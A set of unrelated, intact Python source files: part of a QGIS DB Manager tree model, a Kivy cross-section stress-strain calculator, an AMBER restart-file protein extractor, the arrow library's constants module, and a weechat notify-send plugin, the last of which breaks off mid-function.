if hasattr(self.getItemData(), '_relationType') and self.getItemData()._relationType == 'm':
return self.viewMaterializedIcon
else:
return self.viewIcon
return self.tableIcon
def path(self):
pathList = []
if self.parent():
pathList.extend(self.parent().path())
if self.getItemData().type == Table.VectorType:
pathList.append("%s::%s" % (self.data(0), self.getItemData().geomColumn))
else:
pathList.append(self.data(0))
return pathList
class DBModel(QAbstractItemModel):
importVector = pyqtSignal(QgsVectorLayer, Database, QgsDataSourceUri, QModelIndex)
notPopulated = pyqtSignal(QModelIndex)
def __init__(self, parent=None):
global isImportVectorAvail
QAbstractItemModel.__init__(self, parent)
self.treeView = parent
self.header = [self.tr('Databases')]
if isImportVectorAvail:
self.importVector.connect(self.vectorImport)
self.hasSpatialiteSupport = "spatialite" in supportedDbTypes()
self.hasGPKGSupport = "gpkg" in supportedDbTypes()
self.rootItem = TreeItem(None, None)
for dbtype in supportedDbTypes():
dbpluginclass = createDbPlugin(dbtype)
item = PluginItem(dbpluginclass, self.rootItem)
item.changed.connect(partial(self.refreshItem, item))
def refreshItem(self, item):
if isinstance(item, TreeItem):
# find the index for the tree item using the path
index = self._rPath2Index(item.path())
else:
# find the index for the db item
index = self._rItem2Index(item)
if index.isValid():
self._refreshIndex(index)
else:
qDebug("invalid index")
def _rItem2Index(self, item, parent=None):
if parent is None:
parent = QModelIndex()
if item == self.getItem(parent):
return parent
if not parent.isValid() or parent.internalPointer().populated:
for i in range(self.rowCount(parent)):
index = self.index(i, 0, parent)
index = self._rItem2Index(item, index)
if index.isValid():
return index
return QModelIndex()
def _rPath2Index(self, path, parent=None, n=0):
if parent is None:
parent = QModelIndex()
if path is None or len(path) == 0:
return parent
for i in range(self.rowCount(parent)):
index = self.index(i, 0, parent)
if self._getPath(index)[n] == path[0]:
return self._rPath2Index(path[1:], index, n + 1)
return parent
def getItem(self, index):
if not index.isValid():
return None
return index.internalPointer().getItemData()
def _getPath(self, index):
if not index.isValid():
return None
return index.internalPointer().path()
def columnCount(self, parent):
return 1
def data(self, index, role):
if not index.isValid():
return None
if role == Qt.DecorationRole and index.column() == 0:
icon = index.internalPointer().icon()
if icon:
return icon
if role != Qt.DisplayRole and role != Qt.EditRole:
return None
retval = index.internalPointer().data(index.column())
return retval
def flags(self, index):
global isImportVectorAvail
if not index.isValid():
return Qt.NoItemFlags
flags = Qt.ItemIsEnabled | Qt.ItemIsSelectable
if index.column() == 0:
item = index.internalPointer()
if isinstance(item, SchemaItem) or isinstance(item, TableItem):
flags |= Qt.ItemIsEditable
if isinstance(item, TableItem):
flags |= Qt.ItemIsDragEnabled
# vectors/tables can be dropped on connected databases to be imported
if isImportVectorAvail:
if isinstance(item, ConnectionItem) and item.populated:
flags |= Qt.ItemIsDropEnabled
if isinstance(item, (SchemaItem, TableItem)):
flags |= Qt.ItemIsDropEnabled
# SL/Geopackage db files can be dropped everywhere in the tree
if self.hasSpatialiteSupport or self.hasGPKGSupport:
flags |= Qt.ItemIsDropEnabled
return flags
def headerData(self, section, orientation, role):
if orientation == Qt.Horizontal and role == Qt.DisplayRole and section < len(self.header):
return self.header[section]
return None
def index(self, row, column, parent):
if not self.hasIndex(row, column, parent):
return QModelIndex()
parentItem = parent.internalPointer() if parent.isValid() else self.rootItem
childItem = parentItem.child(row)
if childItem:
return self.createIndex(row, column, childItem)
return QModelIndex()
def parent(self, index):
if not index.isValid():
return QModelIndex()
childItem = index.internalPointer()
parentItem = childItem.parent()
if parentItem == self.rootItem:
return QModelIndex()
return self.createIndex(parentItem.row(), 0, parentItem)
def rowCount(self, parent):
parentItem = parent.internalPointer() if parent.isValid() else self.rootItem
if not parentItem.populated:
self._refreshIndex(parent, True)
return parentItem.childCount()
def hasChildren(self, parent):
parentItem = parent.internalPointer() if parent.isValid() else self.rootItem
return parentItem.childCount() > 0 or not parentItem.populated
def setData(self, index, value, role):
if role != Qt.EditRole or index.column() != 0:
return False
item = index.internalPointer()
new_value = str(value)
if isinstance(item, SchemaItem) or isinstance(item, TableItem):
obj = item.getItemData()
# rename schema or table or view
if new_value == obj.name:
return False
with OverrideCursor(Qt.WaitCursor):
try:
obj.rename(new_value)
self._onDataChanged(index)
except BaseError as e:
DlgDbError.showError(e, self.treeView)
return False
else:
return True
return False
def removeRows(self, row, count, parent):
self.beginRemoveRows(parent, row, count + row - 1)
item = parent.internalPointer()
for i in range(row, count + row):
item.removeChild(row)
self.endRemoveRows()
def _refreshIndex(self, index, force=False):
with OverrideCursor(Qt.WaitCursor):
try:
item = index.internalPointer() if index.isValid() else self.rootItem
prevPopulated = item.populated
if prevPopulated:
self.removeRows(0, self.rowCount(index), index)
item.populated = False
if prevPopulated or force:
if item.populate():
for child in item.childItems:
child.changed.connect(partial(self.refreshItem, child))
self._onDataChanged(index)
else:
self.notPopulated.emit(index)
except BaseError:
item.populated = False
def _onDataChanged(self, indexFrom, indexTo=None):
if indexTo is None:
indexTo = indexFrom
self.dataChanged.emit(indexFrom, indexTo)
QGIS_URI_MIME = "application/x-vnd.qgis.qgis.uri"
def mimeTypes(self):
return ["text/uri-list", self.QGIS_URI_MIME]
def mimeData(self, indexes):
mimeData = QMimeData()
encodedData = QByteArray()
stream = QDataStream(encodedData, QIODevice.WriteOnly)
for index in indexes:
if not index.isValid():
continue
if not isinstance(index.internalPointer(), TableItem):
continue
table = self.getItem(index)
stream.writeQString(table.mimeUri())
mimeData.setData(self.QGIS_URI_MIME, encodedData)
return mimeData
def dropMimeData(self, data, action, row, column, parent):
global isImportVectorAvail
if action == Qt.IgnoreAction:
return True
# vectors/tables to be imported must be dropped on connected db, schema or table
canImportLayer = isImportVectorAvail and parent.isValid() and \
(isinstance(parent.internalPointer(), (SchemaItem, TableItem)) or
(isinstance(parent.internalPointer(), ConnectionItem) and parent.internalPointer().populated))
added = 0
if data.hasUrls():
for u in data.urls():
filename = u.toLocalFile()
if filename == "":
continue
if self.hasSpatialiteSupport:
from .db_plugins.spatialite.connector import SpatiaLiteDBConnector
if SpatiaLiteDBConnector.isValidDatabase(filename):
# retrieve the SL plugin tree item using its path
index = self._rPath2Index(["spatialite"])
if not index.isValid():
continue
item = index.internalPointer()
conn_name = QFileInfo(filename).fileName()
uri = QgsDataSourceUri()
uri.setDatabase(filename)
item.getItemData().addConnection(conn_name, uri)
item.changed.emit()
added += 1
continue
if canImportLayer:
if QgsRasterLayer.isValidRasterFileName(filename):
layerType = 'raster'
providerKey = 'gdal'
else:
layerType = 'vector'
providerKey = 'ogr'
layerName = QFileInfo(filename).completeBaseName()
if self.importLayer(layerType, providerKey, layerName, filename, parent):
added += 1
if data.hasFormat(self.QGIS_URI_MIME):
for uri in QgsMimeDataUtils.decodeUriList(data):
if canImportLayer:
if self.importLayer(uri.layerType, uri.providerKey, uri.name, uri.uri, parent):
added += 1
return added > 0
def importLayer(self, layerType, providerKey, layerName, uriString, parent):
global isImportVectorAvail
if not isImportVectorAvail:
return False
if layerType == 'raster':
return False # not implemented yet
inLayer = QgsRasterLayer(uriString, layerName, providerKey)
else:
inLayer = QgsVectorLayer(uriString, layerName, providerKey)
if not inLayer.isValid():
# invalid layer
QMessageBox.warning(None, self.tr("Invalid layer"), self.tr("Unable to load the layer {0}").format(inLayer.name()))
return False
# retrieve information about the new table's db and schema
outItem = parent.internalPointer()
outObj = outItem.getItemData()
outDb = outObj.database()
outSchema = None
if isinstance(outItem, SchemaItem):
outSchema = outObj
elif isinstance(outItem, TableItem):
outSchema = outObj.schema()
# toIndex will point to the parent item of the new table
toIndex = parent
if isinstance(toIndex.internalPointer(), TableItem):
toIndex = toIndex.parent()
if inLayer.type() == inLayer.VectorLayer:
# create the output uri
schema = outSchema.name if outDb.schemas() is not None and outSchema is not None else ""
pkCol = geomCol = ""
# default pk and geom field name value
if providerKey in ['postgres', 'spatialite']:
inUri = QgsDataSourceUri(inLayer.source())
pkCol = inUri.keyColumn()
geomCol = inUri.geometryColumn()
outUri = outDb.uri()
outUri.setDataSource(schema, layerName, geomCol, "", pkCol)
self.importVector.emit(inLayer, outDb, outUri, toIndex)
return True
return False
def vectorImport(self, inLayer, outDb, outUri, parent):
global isImportVectorAvail
if not isImportVectorAvail:
return False
try:
from .dlg_import_vector import DlgImportVector
dlg = DlgImportVector(inLayer, outDb, outUri)
QApplication.restoreOverrideCursor()
if dlg.exec_():
self._refreshIndex(parent)
finally:
inLayer.deleteLater()
|
'''
Created on 25.08.2016
@author: mkennert
'''
from decimal import Decimal
from kivy.properties import ObjectProperty, NumericProperty, ListProperty
from kivy.uix.gridlayout import GridLayout
from explorer.gui import ExplorerGui
from materialEditor.materiallist import MaterialList
import numpy as np
from ownComponents.design import Design
class Explorer(GridLayout, ExplorerGui):
'''
the Explorer is the component which shows the stress-strain.behaviour
of the selected cross-section-shape
'''
# cross-section-shape
csShape = ObjectProperty()
# layers of the cross-section
layers = ListProperty([])
# bars of the cross-section
bars = ListProperty([])
# height of the cross-section-shape
h = NumericProperty()
# minimum strain
minStrain = NumericProperty(0.5)
# maximum strain
maxStrain = NumericProperty(-0.5)
# minimum stress of the cross section
minStress = NumericProperty()
# maximum stress of the cross section
maxStress = NumericProperty()
# number of integration points
numberIntegration = NumericProperty(100)
# limit of the integration-points
limitIntegration = NumericProperty(1e3)
'''
constructor
'''
def __init__(self, **kwargs):
super(Explorer, self).__init__(**kwargs)
self.cols, self.spacing = 1, Design.spacing
self.graphContent = GridLayout(cols=2)
self.h = self.csShape.ch
self.allMaterial = MaterialList.Instance()
self.create_gui()
'''
update just the cs-properties and the strain-stress-diagram
'''
def update_csShape(self, cs, h, layers, bars):
self.csShape = cs
self.layers = layers
self.bars = bars
self.h = h
'''
update the whole explorer
'''
def update_explorer(self):
self.minStress = self.minStrain
self.maxStress = self.maxStrain
self.calculation(self.minStrain, self.maxStrain, self.numberIntegration)
self.plot()
self.update_graph()
'''
calculate the normal force and the moment
'''
def calculation(self, minStrain, maxStrain, numInt):
# number of reinforcement components
n = len(self.layers) + len(self.bars)
self.y_r = np.zeros(n)
# reinforcement area
self.csArea = np.zeros(n)
self.strain_m, self.stress_m = np.zeros(numInt), np.zeros(numInt)
self.strain_r, self.stress_r = np.zeros(n), np.zeros(n)
# update matrix
self.mlaw = self.allMaterial.allMaterials[3].materialLaw.f
self.y_m = np.linspace(0, self.h, numInt)
self.strain_m = np.interp(
self.y_m, [0, self.h], [minStrain, maxStrain])
self.stress_m = np.array([self.mlaw(strain)
for strain in self.strain_m])
# update all layer-lines
index = 0
for layer in self.layers:
strain = np.interp(layer.y, [0, self.h], [minStrain, maxStrain])
stress = layer.material.materialLaw.f(strain)
self.y_r[index], self.csArea[index] = layer.y, layer.h
self.strain_r[index], self.stress_r[index] = strain, stress
index += 1
# update all bar-lines
for bar in self.bars:
strain = np.interp(bar.y, [0, self.h], [minStrain, maxStrain])
stress = bar.material.materialLaw.f(strain)
self.y_r[index], self.csArea[index] = bar.y, bar.csArea
self.strain_r[index], self.stress_r[index] = strain, stress
index += 1
# calculate the normal force and the moment
stress_y = np.array([s * self.csShape.get_width(s)
for s in self.stress_m])
# normal force
N_m = np.trapz(stress_y, self.y_m)
N_r = np.sum(self.stress_r * self.csArea)
N = N_m + N_r
# moment - matrix
gravity_center = self.csShape._get_gravity_centre()
M_m = np.trapz(stress_y * (self.y_m - gravity_center), self.y_m)
# moment - reinforcement
M_r = np.sum(self.stress_r * self.csArea * (self.y_r - gravity_center))
M = (M_m + M_r)
self.normalForceLbl.text = str('%.2E' % Decimal(str(N)))
self.momentLbl.text = str('%.2E' % Decimal(str(M)))
return N, M, self.strain_m, self.stress_m, self.strain_r, self.stress_r
'''
return the maxStrain of all reinforcement, the y-coordinates and the
minStrain of the concrete
'''
def get_coordinates_upperStrain(self):
#number of reinforcement components
n = len(self.layers) + len(self.bars)
#array to save the y-coordinates of the reinforcement
y_r = np.zeros(n)
#minstrain of the concrete
eps_cu = self.allMaterial.allMaterials[3].materialLaw.minStrain
#cur infimum
eps_u_r = -1e6
index = 0.
#find the maxStrain of the materials
maxStrain=-1e-10
max_stress=-1e-10
i=0;
cnt=0
for layer in self.layers:
points=layer.material.materialLaw.points
for p in points:
if p[1]>max_stress:
max_stress=p[1]
i=cnt
cnt+=1
#if the maxStrain is bigger as the maximum
if maxStrain > eps_u_r:
eps_u_r = points[i][0]
y_r[index] = layer.y
index += 1
i=0;
cnt=0
for bar in self.bars:
points=bar.material.materialLaw.points
for p in points:
if p[1]>max_stress:
max_stress=p[1]
i=cnt
cnt+=1
#if the maxStrain is bigger as the maximum
if maxStrain > eps_u_r:
eps_u_r = points[i][0]
y_r[index] = bar.y
index += 1
return eps_u_r, y_r, eps_cu
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# modificadorRST-AMBER.py
#
# Copyright 2015 Carlos Eduardo Sequeiros Borja <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import sys, restartMaker as rm
from optparse import OptionParser
"""
##############################################################################
# #
# This script just takes an Amber restart file with a protein-funnel #
# complex and extracts only the protein from it. #
# #
##############################################################################
"""
def main():
try:
# We open the restart file to be modified, and put the data in restList
restFile = open(options.inputFile, 'r')
restList = list(restFile)
restFile.close()
# We open the input coordinates file to get the number of atoms of the protein,
# and put the data in refList
refFile = open(options.refFile, 'r')
refList = list(refFile)
refFile.close()
# We get the number of atoms in the protein
numAtmsRef = int(refList[1].split()[0])
# And the atoms from the restart file, only of the protein
atoms = rm.get_atoms(restList, numAtmsRef)
# We generate the protein in an AMBER restart format
protein = rm.generate_prot(atoms)
# And save the protein with the specified name
protFile = open(options.outFile, 'w')
protFile.write(protein)
protFile.close()
except IOError as io:
print "I/O error({0}): {1}".format(io.errno, io.strerror)
parser.print_help()
except TypeError as te:
print str(te) + ' - some argument is missed!!!'
parser.print_help()
except IndexError as ie:
print str(ie) + ' - check your input or ref file!!!'
parser.print_help()
return 0
if __name__ == '__main__':
usage = 'usage: %prog [options] args'
parser = OptionParser(usage)
parser.add_option('-f', '--file', help='Defines the input file that is going to be edited.', action='store', type='string', dest='inputFile')
parser.add_option('-r', '--ref', help='This is the file that contains the desired output number of ATOMS.', action='store', type='string', dest='refFile')
parser.add_option('-o', '--out', help='This is the name for the output file to be generated with the modified number of ATOMS. It is a topology format file. Default outRST.prmtop', action='store', type='string', dest='outFile', default='outRST.prmtop')
(options, args) = parser.parse_args()
main()
|
"""Constants used internally in arrow."""
import sys
from datetime import datetime
if sys.version_info < (3, 8): # pragma: no cover
from typing_extensions import Final
else:
from typing import Final # pragma: no cover
# datetime.max.timestamp() errors on Windows, so we must hardcode
# the highest possible datetime value that can output a timestamp.
# tl;dr platform-independent max timestamps are hard to form
# See: https://stackoverflow.com/q/46133223
try:
# Get max timestamp. Works on POSIX-based systems like Linux and macOS,
# but will trigger an OverflowError, ValueError, or OSError on Windows
_MAX_TIMESTAMP = datetime.max.timestamp()
except (OverflowError, ValueError, OSError): # pragma: no cover
# Fallback for Windows and 32-bit systems if initial max timestamp call fails
# Must get max value of ctime on Windows based on architecture (x32 vs x64)
# https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/ctime-ctime32-ctime64-wctime-wctime32-wctime64
# Note: this may occur on both 32-bit Linux systems (issue #930) along with Windows systems
is_64bits = sys.maxsize > 2 ** 32
_MAX_TIMESTAMP = (
datetime(3000, 1, 1, 23, 59, 59, 999999).timestamp()
if is_64bits
else datetime(2038, 1, 1, 23, 59, 59, 999999).timestamp()
)
MAX_TIMESTAMP: Final[float] = _MAX_TIMESTAMP
MAX_TIMESTAMP_MS: Final[float] = MAX_TIMESTAMP * 1000
MAX_TIMESTAMP_US: Final[float] = MAX_TIMESTAMP * 1_000_000
MAX_ORDINAL: Final[int] = datetime.max.toordinal()
MIN_ORDINAL: Final[int] = 1
DEFAULT_LOCALE: Final[str] = "en-us"
# Supported dehumanize locales
DEHUMANIZE_LOCALES = {
"en",
"en-us",
"en-gb",
"en-au",
"en-be",
"en-jp",
"en-za",
"en-ca",
"en-ph",
"fr",
"fr-fr",
"fr-ca",
"it",
"it-it",
"es",
"es-es",
"el",
"el-gr",
"ja",
"ja-jp",
"sv",
"sv-se",
"zh",
"zh-cn",
"zh-tw",
"zh-hk",
"nl",
"nl-nl",
"af",
"de",
"de-de",
"de-ch",
"de-at",
"nb",
"nb-no",
"nn",
"nn-no",
"pt",
"pt-pt",
"pt-br",
"tl",
"tl-ph",
"vi",
"vi-vn",
"tr",
"tr-tr",
"az",
"az-az",
"da",
"da-dk",
"ml",
"hi",
"fa",
"fa-ir",
"mr",
"ca",
"ca-es",
"ca-ad",
"ca-fr",
"ca-it",
"eo",
"eo-xx",
"bn",
"bn-bd",
"bn-in",
"rm",
"rm-ch",
"ro",
"ro-ro",
"sl",
"sl-si",
"id",
"id-id",
"sw",
"sw-ke",
"sw-tz",
"la",
"la-va",
"lt",
"lt-lt",
"ms",
"ms-my",
"ms-bn",
"or",
"or-in",
}
|
# -*- coding: utf-8 -*-
#
# Project: weechat-notify-send
# Homepage: https://github.com/s3rvac/weechat-notify-send
# Description: Sends highlight and message notifications through notify-send.
# Requires libnotify.
# License: MIT (see below)
#
# Copyright (c) 2015 by Petr Zemek <[email protected]> and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from __future__ import print_function
import os
import re
import subprocess
import sys
import time
# Ensure that we are running under WeeChat.
try:
import weechat
except ImportError:
sys.exit('This script has to run under WeeChat (https://weechat.org/).')
# Name of the script.
SCRIPT_NAME = 'notify_send'
# Author of the script.
SCRIPT_AUTHOR = 's3rvac'
# Version of the script.
SCRIPT_VERSION = '0.9 (dev)'
# License under which the script is distributed.
SCRIPT_LICENSE = 'MIT'
# Description of the script.
SCRIPT_DESC = 'Sends highlight and message notifications through notify-send.'
# Name of a function to be called when the script is unloaded.
SCRIPT_SHUTDOWN_FUNC = ''
# Used character set (utf-8 by default).
SCRIPT_CHARSET = ''
# Script options.
OPTIONS = {
'notify_on_highlights': (
'on',
'Send notifications on highlights.'
),
'notify_on_privmsgs': (
'on',
'Send notifications on private messages.'
),
'notify_on_filtered_messages': (
'off',
'Send notifications also on filtered (hidden) messages.'
),
'notify_when_away': (
'on',
'Send also notifications when away.'
),
'notify_for_current_buffer': (
'on',
'Send also notifications for the currently active buffer.'
),
'notify_on_all_messages_in_buffers': (
'',
'A comma-separated list of buffers for which you want to receive '
'notifications on all messages that appear in them.'
),
'notify_on_all_messages_in_buffers_that_match': (
'',
'A comma-separated list of regex patterns of buffers for which you '
'want to receive notifications on all messages that appear in them.'
),
'notify_on_messages_that_match': (
'',
'A comma-separated list of regex patterns that you want to receive '
'notifications on when message matches.'
),
'min_notification_delay': (
'500',
'A minimal delay between successive notifications from the same '
'buffer (in milliseconds; set to 0 to show all notifications).'
),
'ignore_messages_tagged_with': (
','.join([
'notify_none', # Buffer with line is not added to hotlist
'irc_join', # Joined IRC
'irc_quit', # Quit IRC
'irc_part', # Parted a channel
'irc_status', # Status messages
'irc_nick_back', # A nick is back on server
'irc_401', # No such nick/channel
'irc_402', # No such server
]),
'A comma-separated list of message tags for which no notifications '
'should be shown.'
),
'ignore_buffers': (
'',
'A comma-separated list of buffers from which no notifications should '
'be shown.'
),
'ignore_buffers_starting_with': (
'',
'A comma-separated list of buffer prefixes from which no '
'notifications should be shown.'
),
'ignore_nicks': (
'',
'A comma-separated list of nicks from which no notifications should '
'be shown.'
),
'ignore_nicks_starting_with': (
'',
'A comma-separated list of nick prefixes from which no '
'notifications should be shown.'
),
'hide_messages_in_buffers_that_match': (
'',
'A comma-separated list of regex patterns for names of buffers from '
'which you want to receive notifications without messages.'
),
'nick_separator': (
': ',
'A separator between a nick and a message.'
),
'escape_html': (
'on',
"Escapes the '<', '>', and '&' characters in notification messages."
),
'max_length': (
'72',
'Maximal length of a notification (0 means no limit).'
),
'ellipsis': (
'[..]',
'Ellipsis to be used for notifications that are too long.'
),
'icon': (
'/usr/share/icons/hicolor/32x32/apps/weechat.png',
'Path to an icon to be shown in notifications.'
),
'desktop_entry': (
'weechat',
'Name of the desktop entry for WeeChat.'
),
'timeout': (
'5000',
'Time after which the notification disappears (in milliseconds; '
'set to 0 to disable).'
),
'transient': (
'on',
'When a notification expires or is dismissed, remove it from the '
'notification bar.'
),
'urgency': (
'normal',
'Urgency (low, normal, critical).'
)
}
class Notification(object):
"""A representation of a notification."""
def __init__(self, source, message, icon, desktop_entry, timeout, transient, urgency):
self.source = source
self.message = message
self.icon = icon
self.desktop_entry = desktop_entry
self.timeout = timeout
self.transient = transient
self.urgency = urgency
def default_value_of(option):
"""Returns the default value of the given option."""
return OPTIONS[option][0]
def add_default_value_to(description, default_value):
"""Adds the given default value to the given option description."""
# All descriptions end with a period, so do not add another period.
return '{} Default: {}.'.format(
description,
default_value if default_value else '""'
)
def nick_that_sent_message(tags, prefix):
"""Returns a nick that sent the message based on the given data passed to
the callback.
"""
# 'tags' is a comma-separated list of tags that WeeChat passed to the
# callback. It should contain a tag of the following form: nick_XYZ, where
# XYZ is the nick that sent the message.
for tag in tags:
if tag.startswith('nick_'):
return tag[5:]
# There is no nick in the tags, so check the prefix as a fallback.
# 'prefix' (str) is the prefix of the printed line with the message.
# Usually (but not always), it is a nick with an optional mode (e.g. on
# IRC, @ denotes an operator and + denotes a user with voice). We have to
# remove the mode (if any) before returning the nick.
# Strip also a space as some protocols (e.g. Matrix) may start prefixes
# with a space. It probably means that the nick has no mode set.
if prefix.startswith(('~', '&', '@', '%', '+', '-', ' ')):
return prefix[1:]
return prefix
def parse_tags(tags):
"""Parses the given "list" of tags (str) from WeeChat into a list."""
return tags.split(',')
def message_printed_callback(data, buffer, date, tags, is_displayed,
is_highlight, prefix, message):
"""A callback when a message is printed."""
is_displayed = int(is_displayed)
is_highlight = int(is_highlight)
tags = parse_tags(tags)
nick = nick_that_sent_message(tags, prefix)
if notification_should_be_sent(buffer, tags, nick, is_displayed, is_highlight, message):
notification = prepare_notification(buffer, nick, message)
send_notification(notification)
return weechat.WEECHAT_RC_OK
def notification_should_be_sent(buffer, tags, nick, is_displayed, is_highlight, message):
"""Should a notification be sent?"""
if notification_should_be_sent_disregarding_time(buffer, tags, nick,
is_displayed, is_highlight, message):
# The following function should be called only when the notification
# should be sent (it updates the last notification time).
if not is_below_min_notification_delay(buffer):
return True
return False
def notification_should_be_sent_disregarding_time(buffer, tags, nick,
is_displayed, is_highlight, message):
"""Should a notification be sent when not considering time?"""
if not nick:
# A nick is required to form a correct notification source/message.
return False
if i_am_author_of_message(buffer, nick):
return False
if not is_displayed:
if not notify_on_filtered_messages():
return False
if buffer == weechat.current_buffer():
if not notify_for_current_buffer():
return False
if is_away(buffer):
if not notify_when_away():
return False
if ignore_notifications_from_messages_tagged_with(tags):
return False
if ignore_notifications_from_nick(nick):
return False
if ignore_notifications_from_buffer(buffer):
return False
if is_private_message(buffer):
return notify_on_private_messages()
if is_highlight:
return notify_on_highlights()
if notify_on_messages_that_match(message):
return True
if notify_on_all_messages_in_buffer(buffer):
return True
return False
def is_below_min_notification_delay(buffer):
"""Is a notification in the given buffer below the minimal delay between
successive notifications from the same buffer?
When called, this function updates the time of the last notification.
"""
# We store the time of the last notification in a buffer-local variable to
# make it persistent over the lifetime of this script.
LAST_NOTIFICATION_TIME_VAR = 'notify_send_last_notification_time'
last_notification_time = buffer_get_float(
buffer,
'localvar_' + LAST_NOTIFICATION_TIME_VAR
)
min_notification_delay = weechat.config_get_plugin('min_notification_delay')
# min_notification_delay is in milliseconds (str). To compare it with
# last_notification_time (float in seconds), we have to convert it to
# seconds (float).
min_notification_delay = float(min_notification_delay) / 1000
current_time = time.time()
# We have to update the last notification time before returning the result.
buffer_set_float(
buffer,
'localvar_set_' + LAST_NOTIFICATION_TIME_VAR,
current_time
)
return (min_notification_delay > 0 and
current_time - last_notification_time < min_notification_delay)
def buffer_get_float(buffer, property):
"""A variant of weechat.buffer_get_x() for floats.
This variant is needed because WeeChat supports only buffer_get_string()
and buffer_get_int().
"""
value = weechat.buffer_get_string(buffer, property)
return float(value) if value else 0.0
def buffer_set_float(buffer, property, value):
"""A variant of weechat.buffer_set() for floats.
This variant is needed because WeeChat supports only integers and strings.
"""
weechat.buffer_set(buffer, property, str(value))
def names_for_buffer(buffer):
"""Returns a list of all names for the given buffer."""
# The 'buffer' parameter passed to our callback is actually the buffer's ID
# (e.g. '0x2719cf0'). We have to check its name (e.g. 'freenode.#weechat')
# and short name (e.g. '#weechat') because these are what users specify in
# their configs.
buffer_names = []
full_name = weechat.buffer_get_string(buffer, 'name')
if full_name:
buffer_names.append(full_name)
short_name = weechat.buffer_get_string(buffer, 'short_name')
if short_name:
buffer_names.append(short_name)
# Consider >channel and #channel to be equal buffer names. The reason
# is that the https://github.com/rawdigits/wee-slack script replaces
# '#' with '>' to indicate that someone in the buffer is typing. This
# fixes the behavior of several configuration options (e.g.
# 'notify_on_all_messages_in_buffers') when weechat_notify_send is used
# together with the wee_slack script.
#
# Note that this is only needed to be done for the short name. Indeed,
# the full name always stays unchanged.
if short_name.startswith('>'):
buffer_names.append('#' + short_name[1:])
return buffer_names
def notify_for_current_buffer():
"""Should we also send notifications for the current buffer?"""
return weechat.config_get_plugin('notify_for_current_buffer') == 'on'
def notify_on_highlights():
"""Should we send notifications on highlights?"""
return weechat.config_get_plugin('notify_on_highlights') == 'on'
def notify_on_private_messages():
"""Should we send notifications on private messages?"""
return weechat.config_get_plugin('notify_on_privmsgs') == 'on'
def notify_on_filtered_messages():
"""Should we also send notifications for filtered (hidden) messages?"""
return weechat.config_get_plugin('notify_on_filtered_messages') == 'on'
def notify_when_away():
"""Should we also send notifications when away?"""
return weechat.config_get_plugin('notify_when_away') == 'on'
def is_away(buffer):
"""Is the user away?"""
return weechat.buffer_get_string(buffer, 'localvar_away') != ''
def is_private_message(buffer):
"""Has a private message been sent?"""
return weechat.buffer_get_string(buffer, 'localvar_type') == 'private'
def i_am_author_of_message(buffer, nick):
"""Am I (the current WeeChat user) the author of the message?"""
return weechat.buffer_get_string(buffer, 'localvar_nick') == nick
def split_option_value(option, separator=','):
"""Splits the value of the given plugin option by the given separator and
returns the result in a list.
"""
values = weechat.config_get_plugin(option)
if not values:
# When there are no values, return the empty list instead of [''].
return []
return [value.strip() for value in values.split(separator)]
def ignore_notifications_from_messages_tagged_with(tags):
"""Should notifications be ignored for a message tagged with the given
tags?
"""
ignored_tags = split_option_value('ignore_messages_tagged_with')
for ignored_tag in ignored_tags:
for tag in tags:
if tag == ignored_tag:
return True
return False
def ignore_notifications_from_buffer(buffer):
"""Should notifications from the given buffer be ignored?"""
buffer_names = names_for_buffer(buffer)
for buffer_name in buffer_names:
if buffer_name and buffer_name in ignored_buffers():
return True
for buffer_name in buffer_names:
for prefix in ignored_buffer_prefixes():
if prefix and buffer_name.startswith(prefix):
return True
return False
def ignored_buffers():
"""A generator of buffers from which notifications should be ignored."""
for buffer in split_option_value('ignore_buffers'):
yield buffer
def ignored_buffer_prefixes():
"""A generator of buffer prefixes from which notifications should be
ignored.
"""
for prefix in split_option_value('ignore_buffers_starting_with'):
yield prefix
def ignore_notifications_from_nick(nick):
"""Should notifications from the given nick be ignored?"""
if nick in ignored_nicks():
return True
for prefix in ignored_nick_prefixes():
if prefix and nick.startswith(prefix):
return True
return False
def ignored_nicks():
"""A generator of nicks from which notifications should be ignored."""
for nick in split_option_value('ignore_nicks'):
yield nick
def ignored_nick_prefixes():
"""A generator of nick prefixes from which notifications should be
ignored.
"""
for prefix in split_option_value('ignore_nicks_starting_with'):
yield prefix
def notify_on_messages_that_match(message):
"""Should we send a notification for the given message, provided it matches
any of the requested patterns?
"""
message_patterns = split_option_value('notify_on_messages_that_match')
for pattern in message_patterns:
if re.search(pattern, message):
return True
return False
def buffers_to_notify_on_all_messages():
"""A generator of buffer names in which the user wants to be notified for
all messages.
"""
for buffer in split_option_value('notify_on_all_messages_in_buffers'):
yield buffer
def buffer_patterns_to_notify_on_all_messages():
"""A generator of buffer-name patterns in which the user wants to be
notifier for all messages.
"""
for pattern in split_option_value('notify_on_all_messages_in_buffers_that_match'):
yield pattern
def notify_on_all_messages_in_buffer(buffer):
"""Does the user want to be notified for all messages in the given buffer?
"""
buffer_names = names_for_buffer(buffer)
# Option notify_on_all_messages_in_buffers:
for buf in buffers_to_notify_on_all_messages():
if buf in buffer_names:
return True
